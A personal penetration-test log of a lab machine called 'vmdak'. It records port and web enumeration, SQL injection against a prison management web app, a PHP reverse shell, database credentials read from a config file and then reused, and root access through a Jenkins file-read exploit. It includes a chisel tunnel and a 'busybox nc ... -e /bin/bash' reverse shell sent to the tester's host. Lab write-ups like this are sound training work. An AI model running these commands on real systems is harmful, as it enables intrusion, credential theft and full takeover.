vmdak
๐งช Pentest Log: {{date:2025-08-03}}
๐ Target Information
- Machine Name: vmdak
- IP Address: 192.168.223.103
- Operating System: Linux
ip=192.168.223.103
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 21
ftp anonymous@$ip
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Port 9443
Maltrail v0.52
Google for "Prison Management System exploit", found
CVE-2024-33288
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 9443
- Vulnerability Type: SQLI
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/52017
upload a php reverse shell
nc -lvnp 80
found database password
www-data@vmdak:/var/www/prison/database$ cat connect.php
root:sqlCr3ds3xp0seD
connet to local databse, found vmdak password
mysql -u root -p -h 127.0.0.1
use employee_akpoly;
select * from tblleave;
vmdak:RonnyCache001
๐งฌ Privilege Escalation
๐ค Current Access
- User: vmdak
- Groups: vmdak
- Shell Type: ssh
๐ Enumeration
Running Process:
netstat -antup | grep -ni listen
grep -nRw '8080' /etc/* 2>/dev/null
found
Jenkins 2.401.2
Google for exploit, found
https://github.com/godylockz/CVE-2024-23897
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: N/A
- Target Binary/Service: Jenkins
- Reference / Source: N/A
๐ง Exploit Steps
- Setup
./chisel server --port 8082 --reverse
./chisel client 192.168.45.163:8082 R:8085:127.0.0.1:8080
python3 jenkins_fileread.py -u http://127.0.0.1:8085 -f /root/.jenkins/secrets/initialAdminPassword
140ef31373034d19a77baa9c6b84a200
create a new build task that runs
busybox nc 192.168.45.163 444 -e /bin/bash
- Smash to root
nc -lvnp 4444